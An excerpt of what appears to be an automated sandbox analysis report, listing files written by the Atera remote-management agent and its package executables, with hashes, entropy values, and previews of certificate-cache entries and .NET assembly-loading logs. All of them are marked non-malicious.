                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1716
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                                                              MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                                                              SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                                                              SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                                                              SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):727
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.560079546242875
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:5onfZf4Dc5RlRtBfQ2DcUEqsLrD/t20WIyHfC0ebDqCbZ8wvsRbeRSeo9hHWwnQ9:5iBecdZP/eBIfC0e3qwZ8wtRSe7K3xTa
                                                                                                                                                                                                                                                                                              MD5:05164D501071A25477ECE52F898CFED8
                                                                                                                                                                                                                                                                                              SHA1:64B2F1B1A66E45FF79655E2CF007068E58DEDA19
                                                                                                                                                                                                                                                                                              SHA-256:0F6D822546A0A7B6DBB98817D454CCE45E65859ECE9B5851F8E51DF7EE91FFF0
                                                                                                                                                                                                                                                                                              SHA-512:A095944F38F285A408FD58539102AEC0325A428513C84C4DF793137F532B364CDCD1A8EFC79B1669846882EC5744D711309EF62705834E900F79EE507A4CE255
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1428
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                                                              MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                                                              SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                                                              SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                                                              SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):340
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2358639219875163
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:kKNOq5+7DNfUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:SLkPlE99SCQl2DUeXJlOA
                                                                                                                                                                                                                                                                                              MD5:C707136EF75223EB94D8FE9358A57D1C
                                                                                                                                                                                                                                                                                              SHA1:B4ACCB9DC2E04E5613E0C1E1B939CD9EC8BB299B
                                                                                                                                                                                                                                                                                              SHA-256:2FC8D8C9C7C3E08CE57521B932F7812B25793F906A3C46B507EC3C628C795954
                                                                                                                                                                                                                                                                                              SHA-512:89D53FE6405AF3180CD0431BF89AFEC3F4B66B75CF178F63B9721DA071A1332ED5CA187FEE2FFCE6DDC05893F813C83E5159DB374FA8B28444FC90AA1B3F7A27
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:p...... ...........?2`..(....................................................... ........~..MG......&.....6.........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):400
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9133984983872927
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:kKEQAtp+HlXlRNfOAUMivhClroFzCJCgO3lwuqDnlyQ4hY5isIlQhZgJn:c8TmxMiv8sFzD3quqDkPh8Y2ZM
                                                                                                                                                                                                                                                                                              MD5:E09770EF3274501233D0BBF13E23205D
                                                                                                                                                                                                                                                                                              SHA1:CEA675EFA94B64E7B4A79A7645F3520EE334C548
                                                                                                                                                                                                                                                                                              SHA-256:1D05934490C370DF32CADC80E954BF9D1947FCA38D59655F4B96D7438390C473
                                                                                                                                                                                                                                                                                              SHA-512:7A0E6D20B5C4F6D86277F3BBEC19A839A53CD2127D1A79A9EEC5A3217D22BD282425934B197B593B2AF421FFFA16828925909D1EAB73AC2A832C34F0C1D2E789
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:p...... ...........Q2`..(.................N.._....2.$e....................2.$e.. ........s.52`.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.3.x.L.4.L.Q.L.X.D.R.D.M.9.P.6.6.5.T.W.4.4.2.v.r.s.U.Q.Q.U.R.e.u.i.r.%.2.F.S.S.y.4.I.x.L.V.G.L.p.6.c.h.n.f.N.t.y.A.8.C.E.A.6.b.G.I.7.5.0.C.3.n.7.9.t.Q.4.g.h.A.G.F.o.%.3.D...
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):404
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9295396142652272
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:kK3+fgJaXjzZD/yfOAUMivhClroFHXHDZA6liyZlSlMul0bg3PWovy28lhl+Ksc8:2fgJGKmxMiv8sF3HtllJZIvOP205scn8
                                                                                                                                                                                                                                                                                              MD5:CC904F9E73B8BEBB3DA97EB5FDE6154F
                                                                                                                                                                                                                                                                                              SHA1:B373C07D002B0C198240B18B9EEE24DE9D557BC7
                                                                                                                                                                                                                                                                                              SHA-256:8CC0EE73E8EA732E82990B2E162DBC6AEC06A6B2B89503032FA71ED6809F8D9F
                                                                                                                                                                                                                                                                                              SHA-512:5F6421C624F5B0CD527F924CCF9F575B5743A6C2FFEA2F79B7E2246932252BB4E62BC51FACDA76F727755D9071488135C4CC373A18CAE4234B7DEFB0BB11CF76
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:p...... .... .......>`..(...................._....../e....................../e.. ........L..,`.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.R.X.e.r.F.0.e.F.e.S.W.R.r.i.p.T.g.T.k.c.J.W.M.m.7.i.Q.Q.U.a.D.f.g.6.7.Y.7.%.2.B.F.8.R.h.v.v.%.2.B.Y.X.s.I.i.G.X.0.T.k.I.C.E.A.o.o.S.Z.l.4.5.Y.m.N.9.A.o.j.j.r.i.l.U.u.g.%.3.D...
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):308
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.1920722816696916
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:kKm3zNcalgRAOAUSW0P3PeXJUwh8lmi3Y:uCtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                                                              MD5:EC9B5D114AAFD5EE986411029DA6C837
                                                                                                                                                                                                                                                                                              SHA1:38FC0C29651AFAD36D3A7B91E8B92A502BCCFF3A
                                                                                                                                                                                                                                                                                              SHA-256:63B6F4DB901A72545309E87A66198B973BECB3484DD86A985A36F4650AD421A1
                                                                                                                                                                                                                                                                                              SHA-512:922EE5C9A5C40D3BB9F9C422AEB7553C943A38D6779B3FBBACDF5AFE194D5F1272359B412E5F4DB83958B22040359670490DF7AE0D345A91325B91EC3677F64F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:p...... ..........-/>`..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):412
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9928968587762745
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:kKjMSrXvI/bFhyfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:v0ZUmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                                                              MD5:4C3D74B31764340EFFDBAD0DA6ADA1E5
                                                                                                                                                                                                                                                                                              SHA1:C29D9A81FCC6C44804F67DDC1E5D161AA2D97C76
                                                                                                                                                                                                                                                                                              SHA-256:8C28AF563F4C99DAB2636866DCDDF722C02755BF3150E8B02C9513850371659F
                                                                                                                                                                                                                                                                                              SHA-512:5C1D02283A36B62A7A4400F717E312A64EF46FEC3220BA042AE777712D47C4892A7E012144058F321FE8FBE971BBDD803E2541173A3509861FCEACB169892C02
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:p...... ....(....[.c2`..(.................*.._......!e......................!e.. ..........(2`.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):254
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.05289886697123
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:kKxMpLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:J4LYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                                                              MD5:947B0284C381D8A6FCF95CC1B1FBFE67
                                                                                                                                                                                                                                                                                              SHA1:831905E6FA1D499248CE637444B4EE9DB4ADF61D
                                                                                                                                                                                                                                                                                              SHA-256:3F3A6FA31E8813BDFE22A4F0513BE562DBC5B5B81551372B3F27CC17DA75845C
                                                                                                                                                                                                                                                                                              SHA-512:D23BCCAA3ECD70F92B4A3F9C41B4BD9629D34B881B56DB8A591710C2CFC7AF93AD687107E2069875995DC987A1F97BADB308810ECDC477AFC60F406F0E5B38DD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:p...... ....l......I>`..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1944
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.343420056309075
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:MxHKQg8mHDp684YHKGSI6oPtHTHhAHKKkhHNpaHKlT44HKmHKe60:iqzCYqGSI6oPtzHeqKkhtpaqZ44qmq10
                                                                                                                                                                                                                                                                                              MD5:437E4DCFC04CB727093C5232EA15F856
                                                                                                                                                                                                                                                                                              SHA1:81B949390201F3B70AE2375518A0FFD329310837
                                                                                                                                                                                                                                                                                              SHA-256:5EADB9774A50B6AD20D588FDA58F5A42B2E257A0AA26832B41F8EA008C1EB96B
                                                                                                                                                                                                                                                                                              SHA-512:0332C7E5205CF9221172473A841284487ACC111780A58557231FCDE72A5EDB7E7E3EF6C87AB9682A688BC24992A74027F930267B541039BD8757EEF4E2F51A0E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1983
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.345248756179348
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKksHVsHT6HNHOHKCHKlT40HKe60:iqbYqGSI6oPtzHeqKks1sz6tuqCqZ40T
                                                                                                                                                                                                                                                                                              MD5:F974F0FCD981AC0581C5498C0155EF91
                                                                                                                                                                                                                                                                                              SHA1:0CF6D5F41937B296EF9D37FC90E56EC8458B96DF
                                                                                                                                                                                                                                                                                              SHA-256:500B63AEC50B89EF4CEC9ED49E53D168CDC35D235CB416B84234D3E45F3AC365
                                                                                                                                                                                                                                                                                              SHA-512:1484917CC2A8E88DD4010FEE60394BD974D5C44ED0482DAD64B06A319E1F7E414321B8BDB06C6DE70152CFEA887BBDEFD2F2689C077251E8D2BBC9448FBF8719
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runtime\2702
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):3043
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.361093730986187
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKk9HVsHUHhHKe6PfHKWA1eXrHKlT4d6HNHGHPmHKm:iqbYqGSI6oPtzHeqKk91s0Bq13qhA7qp
                                                                                                                                                                                                                                                                                              MD5:7FBB3BC293626F02EEE5D12A2FC44FE7
                                                                                                                                                                                                                                                                                              SHA1:A736DE9B60CEC25864AE995EF046F3F317B5D1AC
                                                                                                                                                                                                                                                                                              SHA-256:B6ED7FB8E1D3A5AB9858099700CDA16766D6F442587CD6F965815CF8AFC1444D
                                                                                                                                                                                                                                                                                              SHA-512:C175AF1525508EEA8DEAE8BE67E4780922492B3D01ACDB36B43220DE5B57898F10558F80C5D6218B61A236D35C41047527C6AD00770F477E23507AAEA7EF2000
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Net.Http\f4
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2281
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.369081487433356
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT44HKmHKe6+JHxLHqHvHltOoHKkHK/:iqbYqGSI6oPtzHeqKk+qZ44qmq1IRLKC
                                                                                                                                                                                                                                                                                              MD5:531A6F5E28B9249E42480323376AFFAA
                                                                                                                                                                                                                                                                                              SHA1:F812EDC75EB6895946F1DEE24EDEFFA60F8EF190
                                                                                                                                                                                                                                                                                              SHA-256:80BA3C0CDB6BDC36347B1CE852FD6E3CA4A6B3C92C204A7D974689604A662C28
                                                                                                                                                                                                                                                                                              SHA-512:1476EE8202DBE0BABE0001318CF368028E2F103CAF8D77F4B526ADD0EEB314F7E8B68AECD25EBADDEF7A67632865DCDF2AB3C5C3C08AA245780895BBF5F60BF7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1716
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.341926971773382
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkWHKCHKlT40HKe60HNpv:iqbYqGSI6oPtzHeqKkWqCqZ40q10tpv
                                                                                                                                                                                                                                                                                              MD5:063D709F01B78478C26522681AF5097D
                                                                                                                                                                                                                                                                                              SHA1:A6B4619D729EE3FA6206B74DB2699DD676470E20
                                                                                                                                                                                                                                                                                              SHA-256:C5E8941B824143B5F0477345582F8495B4EECF7901145EA6085FB36B57B64D39
                                                                                                                                                                                                                                                                                              SHA-512:C6C15C1655E42EEE66F0B5397E25691EE836B0095FDD3C5D202DF06855AFED2FE57CFA094DEE9C5327CDC27A8AEFD532A50638B2DEDA9A3B57B6EBE6AC3EB847
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\ce
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe
                                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1921
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.369488805277227
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkWHKCHKlT40HKe6gHeHK/:iqbYqGSI6oPtzHeqKkWqCqZ40q1g+q/
                                                                                                                                                                                                                                                                                              MD5:39BA2FA7696119EA870E3FAC4407C38A
                                                                                                                                                                                                                                                                                              SHA1:16B75C6AC116A443F1EB521949F47BA505AF9B4F
                                                                                                                                                                                                                                                                                              SHA-256:DC31B098095BC4FCDD8D7801FD2DD381F3EFFB91BDC828A86628AEABC451D113
                                                                                                                                                                                                                                                                                              SHA-512:2D9A05E99B3E5DB253C1B4849D23A1959253F021A714C04191BD963AD9FA844500CD753E527E98A016ECA7571060CDA4065DD7E84C134563BFCAF25CBB2767DF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\ce
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1075
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.353521172341231
